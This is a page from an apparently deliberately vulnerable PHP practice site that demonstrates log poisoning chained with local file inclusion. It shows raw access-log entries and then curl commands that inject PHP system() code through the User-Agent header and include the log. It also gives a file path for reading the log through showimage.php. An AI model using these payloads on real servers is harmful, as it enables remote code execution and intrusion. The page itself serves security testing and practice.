Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Log Injection / Log Poisoning Demo

Request logged.

Including log file (LFI via Log Poisoning):

[2026-07-10 16:37:03] IP: 37.27.135.61 | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | URI: /logpoison.php
[2026-07-10 16:37:04] IP: 37.27.135.61 | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | URI: /logpoison.php?show=1
[2026-07-10 16:37:04] GET: show = 1
[2026-07-10 18:22:26] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php
[2026-07-10 18:24:29] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?show=1
[2026-07-10 18:24:29] GET: show = 1
[2026-07-10 19:34:55] IP: 208.91.111.227 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?include=1
[2026-07-10 19:34:55] GET: include = 1

Log Poisoning Attack

1. Inject PHP code into User-Agent header:

curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"

2. Then include the log file via LFI:

curl "http://localhost/logpoison.php?include=1"

Or use the LFI in showimage.php to read the log file:

showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log

Actions